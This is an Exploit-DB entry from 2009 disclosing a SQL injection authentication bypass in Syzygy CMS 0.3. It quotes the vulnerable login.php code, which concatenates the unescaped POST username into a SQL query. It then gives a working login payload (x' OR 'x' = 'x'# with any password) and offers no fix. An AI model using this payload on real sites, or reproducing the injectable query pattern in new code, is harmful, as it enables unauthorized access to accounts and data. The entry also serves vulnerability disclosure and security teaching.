Syzygy CMS 0.3 - Authentication Bypass

EDB-ID:

7759

CVE:

N/A

EDB Verified:

Author:

darkjoker

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2009-01-14

Vulnerable App:

--+++=========================================================================+++--
--+++====== Syzygy CMS <= 0.3 (Auth Bypass) SQL Injection Vulnerability ======+++--
--+++=========================================================================+++--

[+] Syzygy CMS <= 0.3 (Auth Bypass) SQL Injection Vulnerability
[+] Author : darkjoker
[+] Site   : http://darkjoker.net23.net
[+] Greetz : my girlfriend, Vivi
[+] File   : login.php

[+] Code:
    17  $username=$_POST['username'];
    18  $password=md5($_POST['password']);
    19  $current_login=mysql_query("SELECT * FROM ".$mysql_prefix."users WHERE username='".$username."' AND password='".$password."'");
    20
    21  if (mysql_num_rows($current_login)==0)
    22  {
    23          header("Location: http://".$_SERVER['HTTP_HOST'].dirname($_SERVER['PHP_SELF'])."/"."index.php?page=invalid.php");
    24  } else {
    25		$current_user=mysql_fetch_array($current_login, MYSQL_ASSOC);
    26		$_SESSION['user']=$current_user['username'];
    27		$_SESSION['perms']=$current_user['perms'];
    28 		$style_query=mysql_query("SELECT filename FROM ".$mysql_prefix."layout_style WHERE id='".$current_user['style']."'");
    29		$style_info=mysql_fetch_array($style_query,MYSQL_ASSOC);
    30 		$_SESSION['style']=$style_info['filename'];
    31		header("Location: http://".$_SERVER['HTTP_HOST'].dirname($_SERVER['PHP_SELF'])."/"."index.php");
    32  }

[+] Username: x' OR 'x' = 'x'#
[+] Password: anything

# milw0rm.com [2009-01-14]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services